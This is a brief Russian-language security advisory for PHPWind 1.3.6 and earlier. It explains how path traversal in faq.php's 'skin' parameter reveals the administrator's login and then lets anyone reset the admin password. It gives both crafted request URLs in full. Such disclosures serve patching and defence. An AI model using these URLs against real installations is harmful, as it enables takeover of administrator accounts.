Программа: PHPWind 1.3.6 и более ранние версии
Уязвимость позволяет злоумышленнику получить имя пользователя администратора и изменить его пароль.
Удаленный пользователь может вызвать сценарий faq.php и получить текущий login администратора.
Пример:
faq.php?skin=../../admin/manager&tplpath=admin
Затем удаленный пользователь может изменить пароль администратора с помощью специально сформированного
URL.
Пример:
faq.php?skin=../../admin/manager&username=[adminname] &password=[adminpass]&check_pwd=
[adminpass]&act ion=go
